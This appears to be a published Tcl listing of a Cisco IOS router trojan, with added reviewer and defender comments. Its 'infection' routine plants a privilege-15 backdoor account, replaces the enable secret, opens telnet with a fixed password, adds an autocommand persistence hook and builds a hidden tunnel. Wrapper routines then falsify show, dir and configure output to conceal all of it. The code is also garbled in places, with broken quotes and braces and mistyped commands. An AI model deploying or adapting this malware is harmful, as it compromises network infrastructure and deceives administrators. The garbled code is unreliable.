[cc lang=”tcl”]proc iosTrojan {}{
# infection: one-shot setup that rewrites the device configuration through
# ios_config. From the lines below it changes vty 0-4 access, adds a
# privilege-15 local user, replaces the enable secret and builds Tunnel0.
# Defender note: every value here is a hard-coded string, so the local user,
# the autocommand reference to NVRAM:iosTrojan.Tcl and the Tunnel0 addressing
# can serve as configuration-audit indicators. Audit against a configuration
# copy obtained off-box, because the sh_* and show_* procs in this listing
# filter what the on-box show commands print.
# NOTE(review): the listing is garbled as published (typographic quotes,
# truncated keywords); comments describe apparent intent only.
proc infection {}{
# Issues the IOS exec command terminal no monitor for the current session.
exec “terminal no monitor”
# vty 0-4: removes local-user login, clears the allowed transports, then
# re-enables telnet and sets a static line password.
ios_config “line vty 0 4” “no login local”
ios_config “line vty 0 4” “no transport input”
ios_config “line vty 0 4” “”no autocomman”
ios_config “line vty 0 4” “transport input telnet”
ios_config “line vty 0 4” “password iamatroyan”
# Console line is switched to local-user login.
ios_config “line console 0” “login local”
# Adds a privilege-15 account with a hard-coded password.
ios_config “username jdoe priv 15 password iamahacker”
# Persistence hook: an autocommand that points at the NVRAM copy of this
# script. Any autocommand naming a Tcl file deserves review in an audit.
ios_config “line vty 0 4” “”username jdoe autocommand Tclsh NVRAM:iosTrojan.Tcl”
# Removes the existing enable secret and password, then sets a new secret.
ios_config “no enable secret”
ios_config “no enable password”
ios_config “enable secret iamhacked Cisco”
ios_config “service password-encryption”
# Builds interface tunnel 0: 192.168.10.1 with mask 255.255.255.252,
# sourced from fastethernet 0/0, destination 192.168.3.1.
ios_config “interface tunnel 0” “ip address 192.168.10.1 255.255.255.252”
ios_config “interface tunnel 0” “tunnel source fastethernet 0/0”
ios_config “interface tunnel 0” “tunnel destination 192.168.3.1”
}
# sh_int: stand-in for the show interfaces command. It redirects the real
# output to NVRAM:int.txt, echoes it line by line, and stops at the first
# line that begins with Tunnel0, so that interface and anything listed after
# it are not shown. The temporary file is deleted afterwards.
# Defender note: on a device running this wrapper the on-box interface
# listing is not trustworthy; short-lived files in NVRAM are a side effect.
# NOTE(review): this proc does not parse as published (see the typo note at
# the end of the page); the description reflects apparent intent.
proc sh_int {}{
exec “show interfaces | redirect NVRAM:int.txt”
set itf [open “NVRAM:int.txt” r]
fconfigure $itf -buffering line
gets $itf datos
while {![eof $itf]} {
# Output is cut off at the Tunnel0 entry instead of skipping only that entry.
if {[string match “Tunnel0*” $datos]} {

break

} else {
puts $datos
{
gets $itf datos
{
close $it
file delete NVRAM:int.txt
}
# dir_NVRAM: stand-in for the dir NVRAM: command. It captures the real
# directory listing, writes it to NVRAM:dirNVRAM.txt, reads it back line by
# line and prints every line except those containing iosTrojan.Tcl. The
# temporary file is deleted at the end.
# Defender note: the script hides its own file name from the on-box
# directory listing, so file inventory has to be verified by other means.
proc dir_NVRAM {}
{
set output [exec “dir NVRAM:”]
set itf [open “NVRAM:dirNVRAM.txt” w]

puts $itf $output
close $itf
set itf [open “NVRAM:dirNVRAM.txt” r]
fconfigure $itf -buffering line
gets $itf datos
while {![eof $itf]} {
# Empty branch: matching lines are dropped silently.
if {[string match “*iosTrojan.Tcl*” $datos]} {
}else{
puts $datos
}
gets $itf datos
}
close $itf
file delete NVRAM:dirNVRAM.txt
}

# getInput: reads stdin one character at a time and returns the accumulated
# string once one of two terminator characters is read. Empty reads are
# skipped; one specific character removes the last character collected so
# far; every other character is appended.
# NOTE(review): the character literals and closing braces look altered in
# transcription; confirm against the original publication before relying on
# this description.
proc getInput {} {
set ret “”
while {[set ch [read stdin 1]] != “n” && $ch != “r”} {
if {$ch == “”} continue
# Delete-style handling: drop the last collected character.
if {$ch == “u007f”} {
set ret [string range $ret 0 end-1]
} else {
append ret $ch
{
flush stdout
{
return $ret
{
# sh_version: stand-in for the show version command. It redirects the real
# output to NVRAM:vers.txt and echoes it, except that any line beginning
# with Compiled is replaced by a fixed string. The temporary file is deleted
# at the end.
# Defender note: the compile banner printed by this wrapper is a constant
# and says nothing about the image that is actually running.
proc sh_version {} {
exec “show version | redirect NVRAM:vers.txt”
set vf [open “NVRAM:vers.txt” r]
fconfigure $vf -buffering line
gets $vf datos
while {![eof $vf]} {
if {[string match “Compiled*” $datos]} {
# Constant replacement text, printed instead of the real line.
puts “Compiled Wed 25-Apr-2007 03:18 by Manuel Santander”
} else {
puts $datos
}
gets $vf datos
}
close $vf

file delete NVRAM:vers.txt
}

# sh_int_brief: stand-in for show ip interface brief. It redirects the real
# output to NVRAM:shipint.txt and prints every line except those that begin
# with Tunnel. The temporary file is deleted at the end.
# Defender note: tunnel interfaces are absent from this view by design, so
# their absence here is not evidence that none are configured.
proc sh_int_brief {} {
exec “show ip interface brief | redirect NVRAM:shipint.txt”
set vf [open “NVRAM:shipint.txt” r]
fconfigure $vf -buffering line
gets $vf datos
while {![eof $vf]} {
# Empty branch: matching lines are dropped silently.
if {[string match “Tunnel*” $datos]} {
} else {
puts $datos
}
gets $vf datos
}
close $vf
file delete NVRAM:shipint.txt
}

# sh_ip_route: stand-in for show ip route. It redirects the real output to
# NVRAM:shiproute.txt and prints every line except those containing Tunnel
# or 192.168.10.0. The temporary file is deleted at the end.
# Defender note: routes through the tunnel network are filtered from the
# on-box view; routing state should be cross-checked from neighbouring
# devices or flow data.
proc sh_ip_route {} {
exec “show ip route | redirect NVRAM:shiproute.txt”
set vf [open “NVRAM:shiproute.txt” r]
fconfigure $vf -buffering line
gets $vf datos
while {![eof $vf]} {
# Both empty branches drop the matching line without printing it.
if {[string match “*Tunnel*” $datos]} {
} else {
if {[string match “*192.168.10.0*” $datos]} {
} else {
puts
$datos
}
}
gets $vf datos
}
close $vf
file delete NVRAM:shiproute.txt
}
# show_conf: stand-in for show configuration. It redirects the real output
# to NVRAM:shconf.txt and prints every line except those containing
# iosTrojan, Tunnel, or ip address 192.168.10. The temporary file is deleted
# at the end.
# Defender note: filtering is per line and by substring only; configuration
# review on a suspect device should use a copy retrieved and inspected
# off-box rather than this output.
proc show_conf {} {
exec “show configuration | redirect NVRAM:shconf.txt”
set vf [open “NVRAM:shconf.txt” r]
fconfigure $vf -buffering line
gets $vf datos
while {![eof $vf]} {
# Three nested filters; each empty branch drops the matching line.
if {[string match “*iosTrojan*” $datos]} {
} else {
if {[string match “*Tunnel*” $datos]} {
} else {
if {[string match “*ip address 192.168.10*” $datos]} {
} else {
puts $datos
}
}
}
gets $vf datos
}
close $vf
file delete NVRAM:shconf.txt
}
# show_run_conf: stand-in for the running-configuration display. It
# redirects the command output to NVRAM:shrconf.txt and prints every line
# except those containing iosTrojan, Tunnel, or ip address 192.168.10. The
# temporary file is deleted at the end.
# Defender note: same substring filters as show_conf, so the two on-box
# configuration views agree with each other while both omit the same lines.
# NOTE(review): the command string is reproduced exactly as published.
proc show_run_conf {} {
exec “show running5config | redirect NVRAM:shrconf.txt”
set vf [open “NVRAM:shrconf.txt” r]
fconfigure $vf -buffering line
gets $vf datos
while {![eof $vf]} {
# Three nested filters; each empty branch drops the matching line.
if {[string match “*iosTrojan*” $datos]} {
} else {
if {[string match “*Tunnel*” $datos]} {
} else {
if {[string match “*ip address 192.168.10*” $datos]} {
} else {
puts $datos
}
}
}
gets $vf datos
}
close $vf
file delete NVRAM:shrconf.txt
}
# conf_t: imitates the configure terminal dialogue. It prints a prompt built
# from the hostname, reads commands with getInput until exit is entered, and
# forwards them to ios_config. Commands matching int*, router * or lin *
# open an imitation sub-mode prompt whose inputs are applied together with
# the parent command. Errors raised by ios_config are caught and printed.
# Defender note: in the line sub-mode, inputs containing transport, password
# or autocommand are discarded without any message, so an administrator
# correcting vty settings through this shell sees no error and no change.
# Remediation should not be attempted from a session on the affected device
# that may be running inside this wrapper.
# NOTE(review): brace layout and prompt strings are garbled as published.
proc conf_t {} {
fconfigure stdout -buffering none
set c_prompt [info hostname]
append c_prompt “(config)#”
puts “Enter configuration commands, one per line. End with CNTL/Z.”
puts -nonewline $c_prompt
set comando [getInput]
while {[string compare $comando “exit”]} {
# Interface sub-mode: each input is applied under the parent command.
if {[string match “int*” $comando]} {
set i_prompt [info hostname]
append i_prompt “(config5if)#”
puts -nonewline $i_prompt
set i_comando [getInput]
while {[string compare $i_comando “exit”]} {
if {[catch {ios_config “$comando” “$i_comando”} e]} {
puts $e
}
puts -nonewline $i_prompt
set i_comando [getInput]
}
} else {
# Router sub-mode: same pattern as the interface sub-mode.
if {[string match “router *” $comando]} {
set r_prompt [info hostname]
append r_prompt “(config5router)#”
puts -nonewline $r_prompt
set r_comando [getInput]
while {[string compare $r_comando “exit”]} {
if {[catch {ios_config “$comando” “$r_comando”} e]} {
puts $e
}
puts -nonewline $r_prompt
set r_comando [getInput]
}
} else {
# Line sub-mode: inputs touching transport, password or autocommand fall
# into empty branches and are never passed to ios_config.
if {[string match “lin *” $comando]} {
set l_prompt [info hostname]
append l_prompt “(config5line)#”
puts -nonewline $l_prompt
set l_comando [getInput]
while {[string compare $l_comando “exit”]} {
if {[string match “*transport*” $l_comando]} {
}
else
{
if {[string match “*password*” $l_comando]}
{
} else
{
if {[string match “*autocommand*” $l_comando]} {
} else {
if {[catch {ios_config “$comando” “$l_comando”} e]} {
puts $e
}
}
}
}
puts -nonewline $r_prompt
set r_comando [getInput]
}
} else {
# Any other command is applied directly as a single global config line.
if {[catch {ios_config “$comando”} e]} {
puts $e
}
}
}
}
puts -nonewline $c_prompt
set comando [getInput]
}
}

# Main body: applies the configuration changes once via infection, then runs
# an imitation exec-mode prompt (hostname followed by #) until exit is
# entered. Each input is tested against a set of regular expressions that
# accept abbreviated forms of the intercepted commands; a match dispatches
# to the corresponding filtering proc, anything else is handed to exec.
# Defender note: inside this loop the session answers an attempt to start a
# Tcl shell with the standard invalid-input message, and the show, dir and
# configure commands are served by the filtering procs. Output seen in such
# a session cannot be used to clear the device; rely on off-box configuration
# copies, command-accounting logs and signed-script enforcement instead.
# NOTE(review): reproduced exactly as published, including garbled quotes,
# braces and variable names.
infection

fconfigure stdout -buffering none
set resultado1 “”
set resultado2 “”
set resultado3 “”
set resultado4 “”
set resultado5 “”
set resultado6 “”
set resultado7 “”
set resultado8 “”
set resultado9 “”
set salidafinal “”
set n_prompt [info hostname]
append n_prompt “#”
puts ” ”
puts -nonewline $n_prompt
set comando [getInput]
while {[string compare $comando “exit”]} {
# Command recognition: one pattern per intercepted command family.
regexp “sh(ow|o)? int(erfaces|erface|erfac|erfa|erf|er|e)?” $comando resultado1

regexp “sh(ow|o)? ver(sion|sio|si|s)?” $comando resultado2

regexp “sh(ow|o)? conf(iguration|iguratio|igurati|igurat|igura|igur|igu|ig|i)?” $comando resultado3

regexp “sh(ow|o)? run(ning5config|ning5confi|ning5conf|ning5con|ning5co|ning5c|ning5|ning|nin|ni|n)?” $comando resultado

regexp “sh(ow|o)? ip int(erface|erfac|erfa|erf|er|e)? br(ief|ie|i)?” $comando resultado5

regexp “dir nv(ram:|ram|ra|r)?” $comando resultado6

regexp “Tcls(h)?” $comando resultado7

regexp “sh(ow|o)? ip ro(ute|ut|u)?” $comando resultado8

regexp “conf(igure|igur|igu|ig|i)? t(erminal|ermina|ermin|ermi|erm|er|e)?” $comando
resultado9

# Dispatch chain: the first non-empty match variable selects the handler.
if {[string compare “” $resultado1]} {

sh_int
} else {
if {[string compare “” $resultado2]} {

sh_version
} else {
if {[string compare “” $resultado3]} {

show_conf
} else {
if {[string compare “” $resultado4]} {

show_run_conf
} else {
if {[string compare “” $resultado5]} {

sh_int_brief
} else {
if {[string compare “” $resultado6]} {

dir_NVRAM
} else {
# A request for the Tcl shell is answered with the invalid-input text.
if {[string compare “” $resultado7]} {

puts ”

puts ” Invalid input detected at ‘^’ marker.”
puts ”

}
else
{
if {[string compare “” $resultado8]} {

sh_ip_route
} else
{
if {[string compare “” $resultado9]}

{
conf_t
} else {
# Everything else goes to exec; a failure prints the invalid-input text.
if {[catch {set salidafinal [exec $comando]} e]} {
puts ” ”
puts ” Invalid input detected at ‘^’ marker.”
puts ” ”
}
}
}
}
}
}
}
}
}
}
# Match variables are cleared before the next prompt is shown.
set resultado1 “”
set resultado2 “”
set resultado3 “”
set resultado4 “”
set resultado5 “”
set resultado6 “”
set resultado7 “”
set resultado8 “”
set resultado9 “”
set salidafinal “”
puts -nonewline $n_prompt
set comando [getInput]
}
# Leaving the loop issues the exec-mode exit command.
exec “exit”
}
iosTrojan[/cc]

/* Note: this listing still needs to be checked for typos. */
Source